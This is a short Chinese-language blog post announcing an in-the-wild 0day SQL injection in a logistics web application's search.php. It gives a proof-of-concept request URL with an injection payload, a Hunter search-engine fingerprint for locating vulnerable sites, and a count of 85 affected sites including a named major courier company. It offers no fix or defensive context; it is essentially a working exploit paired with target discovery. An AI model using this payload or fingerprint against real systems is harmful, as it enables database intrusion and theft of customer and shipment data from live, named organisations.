loading...
在野利用物流0day
Published in:2022-03-31 | category: 0day漏洞

国内物流0day

文件search.php处存在SQL漏洞

Poc:

1
/search.php?act=detail&bglxid=972鎈%27"%5C%28&cc=4111111111111111%2C&city=&country=NSW新南威尔士州&czcc=1&gg=1%2C&js=1%2C&kk=1%2C&weight=1%2C&youbian=

鹰图指纹:

1
web.body="user.php?act=recognition"

受影响站:85个

受影响大公司:申通

截屏2022-03-31 04.36.58

Prev:
网络空间搜索引擎
Next:
Log4漏洞利用工具
catalog
catalog